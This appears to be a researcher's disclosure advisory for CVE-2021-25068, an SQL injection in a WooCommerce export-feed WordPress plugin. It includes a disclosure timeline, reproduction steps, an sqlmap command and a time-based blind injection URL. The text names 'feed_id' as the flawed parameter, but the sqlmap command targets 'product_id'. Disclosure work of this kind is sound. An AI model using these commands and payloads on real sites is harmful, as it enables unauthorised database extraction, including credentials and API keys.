Dec 13, 2021: Issue Identified and Disclosed to Wpscan (#5634)
Dec 13, 2021 : Got auto reply
Dec 16th, 2021 : Got update that vendor had been contacted, CVE Assigned CVE-2021-25068
February 21, 2022: Plugin closed
March 28, 2022: CVE Published in NVD
The 'Exportfeed for Woocommerce Google Product Feed' Wordpress plugin v1.2.4 uses a 'feed_id' POST parameter which is not properly sanitized for use in an SQL statement, leading to a SQL injection vulnerability.
We can see the problematic code in fetch_product_ajax.php
This vulnerability is present in the current version of the plugin 1.2.4 Administrative access is required to access the vulnerable functionality.
Link to plugin:
Steps to reproduce:
1. Log into WordPress as the admin user
2. Install WooCommerce and 'Exportfeed for Woocommerce Google Product Feed' plugins
3. Perform initial config for the WooCommerce plugin and create a product
4. In the ExportFeed plugin settings go to Create Feed and Click Custom Product Feed, search for a product and capture the request with an intercepting proxy.
5. Modify the original request parameters so we hit the appropriate functionality
6. Save the request to a file, request.txt
7. Run sqlmap to pull the current user
sqlmap -r request.txt --dbms=mysql --current-user --keep-alive --level=3 --risk=3 -p product_id --threads=5 --flush-session
https://test0.local/wp-admin/admin-ajax.php?security=a5e2dfc8ec&action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&keywords=snake&category=&brand=&sku=&merchat_type=Google&service_name=Google&limit=0,10&q=showT&feed_id=1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)
Using this technique, we can also (slowly) dump the entire contents of the database, including the key for the ebay connection this plugin uses, WordPress users, and so on.